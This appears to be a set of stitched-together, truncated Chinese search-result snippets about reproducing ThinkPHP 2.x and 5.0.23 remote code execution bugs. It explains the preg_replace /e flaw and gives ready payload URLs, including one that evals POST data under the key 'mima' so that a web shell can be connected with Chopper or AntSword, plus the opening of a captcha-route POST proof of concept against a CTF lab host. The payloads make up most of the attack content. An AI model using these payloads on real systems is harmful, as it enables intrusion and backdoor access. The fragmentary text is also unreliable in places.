$subject: 要搜索替换的目标字符串或字符串数组。 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了/e这个修饰符,则存在代码执行漏洞。 漏洞影响版本: ThinkPHP 2.x 漏洞利用: index.php/module/aciton/param1/${@phpinfo()} ?s=/Index/index/L/${@phpinfo()} 漏洞复现: ...
漏洞影响范围 thinkphp2.x 漏洞复现 payload1 /index.php?s=/index/index/xxx/${@phpinfo()} //出现phpinfo明杆路径 payload2 /index.php?s=a/b/c/${@print(eval($_POST['mima']))} //使用菜刀或蚁剑连接
[ThinkPHP]5.0.23-Rce 环境搭建 github传送门 BUU传送门 POC 老懒狗选择直接buu,链接 http://node3.:27512/ 1 直接用poc打一下: POST /index.php?s=captcha HTTP/1.1 Host: node3.:27512 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9...
访问页面,发现是一个Thinkphp的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本是2.x。如果不知道版本可通过乱输入路径进行报错,或是使用云悉指纹识别进行检测 此时输入已爆出的远程代码执行命令即可复现漏洞: /index.php?s=/index/index/xxx/${@phpinfo()} //phpinfo敏感文件 /index.php?s=a/b/c/${@p...